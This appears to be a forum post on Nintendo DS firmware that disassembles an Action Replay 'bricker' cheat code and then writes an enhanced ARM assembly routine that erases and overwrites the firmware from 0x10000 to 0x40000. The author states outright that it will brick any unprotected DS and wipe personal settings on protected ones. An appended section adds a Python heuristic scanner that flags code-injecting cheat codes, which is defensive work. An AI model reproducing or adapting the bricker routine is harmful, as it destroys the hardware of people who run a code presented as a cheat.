I actually stepped through this code in no$gba.
Here is what actually happens.
Code:
02780100 EB01D8F0 bl 27F64C8h ;Set the firmware write enable latch
02780104 E3A0050E mov r0,3800000h ;
02780108 EB01D8C1 bl 27F6414h ;Verify the Write enable latch is set.
0278010C E3110002 tst r1,2h ;
02780110 0AFFFFFB beq 2780104h ;If for some reason, the write enable latch is not set, it will lock up forever at this point, without any DS bricking action.
02780114 E3A00801 mov r0,10000h ;
02780118 E3A01803 mov r1,30000h ;
0278011C E3A02402 mov r2,2000000h ;
02780120 EB01D7D9 bl 27F608Ch ; Overwrite address 0x10000 with 0x100 bytes of data from ram address 0x2000000.
02780124 EAFFFFFE b 2780124h ;
From disassembling the firmware writing routine, I have determined that in order to completely erase and overwrite the firmware, prior to the branch point, a little bit more work is required.
The assembler code for this is
Code:
mov r4,10000h
bl 27F64C8
Wait_latch_enabled:
mov r0,3800000
bl 27F6414h
tst r1,2h
beq Wait_latch_enabled
mov r0, r4
Firmware_write_loop:
mov r1, 100h
mov r2, 2000000h
bl 27F608Ch
add r4, r4, 100h
cmp r4, 40000h
blt Firmware_write_loop
Endless_loop:
b Endless_loop
In action replay code form, that is
Because the original bricker code only wrote 0x100 bytes to firmware address 0x10000, anybody with a bricker-proof DS would notice no effects whatsoever. Not exactly what the original code creator had intended. This one will brick any DS system that is not bricker-proof, and even if the DS is bricker-proof, it will still overwrite the personal settings area of the firmware.
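Added example, not part of the original post: a static screen that a cheat-database maintainer could run over submitted Action Replay DS codes to flag ones that inject ARM code, as the code discussed above does. The code-type layout it relies on (0-type 32-bit write, E-type bulk write with a byte count) is an assumption not stated in the post, and the function names and both samples are constructed.

```python
import re

LDR_PC_TRAMPOLINE = 0xE51FF004  # ARM "ldr pc,[pc,#-4]": jump to the address in the next word
PAIR = re.compile(r"([0-9A-Fa-f]{8})\s+([0-9A-Fa-f]{8})")

def is_arm_branch(word):
    """True for ARM B/BL encodings: bits 27..25 == 0b101, condition field not 0xF."""
    return (word >> 25) & 0x7 == 0x5 and (word >> 28) != 0xF

def scan_ar_code(text):
    """Heuristic scan; returns a list of (finding, address, branch_count) tuples."""
    pairs = [(int(m[1], 16), int(m[2], 16))
             for m in map(PAIR.fullmatch, map(str.strip, text.splitlines())) if m]
    findings, i = [], 0
    while i < len(pairs):
        first, second = pairs[i]
        i += 1
        kind, addr = first >> 28, first & 0x0FFFFFFF
        if kind == 0x0 and second == LDR_PC_TRAMPOLINE:
            findings.append(("hook", addr, 0))      # 32-bit write of a jump trampoline
        elif kind == 0xE:
            # Assumed E-type layout: second word is a byte count, payload follows
            # at 8 bytes per code line.
            nlines = (second + 7) // 8
            if nlines > len(pairs) - i:
                findings.append(("truncated", addr, 0))
                break
            words = [w for p in pairs[i:i + nlines] for w in p][:(second + 3) // 4]
            i += nlines
            branches = sum(is_arm_branch(w) for w in words)
            if branches:
                findings.append(("code-write", addr, branches))
    return findings

# Constructed samples (not taken from the post)
INJECTING = """02000000 E51FF004
02000004 02000100
E2000100 00000008
E1A00000 EAFFFFFE
D2000000 00000000"""
BENIGN = """02001234 000003E7
12005678 0000270F"""

if __name__ == "__main__":
    for name, code in (("INJECTING", INJECTING), ("BENIGN", BENIGN)):
        print(name, scan_ar_code(code))
```

A bulk write of plain data can contain words that happen to look like branches, so a finding marks a code for manual review rather than proving intent.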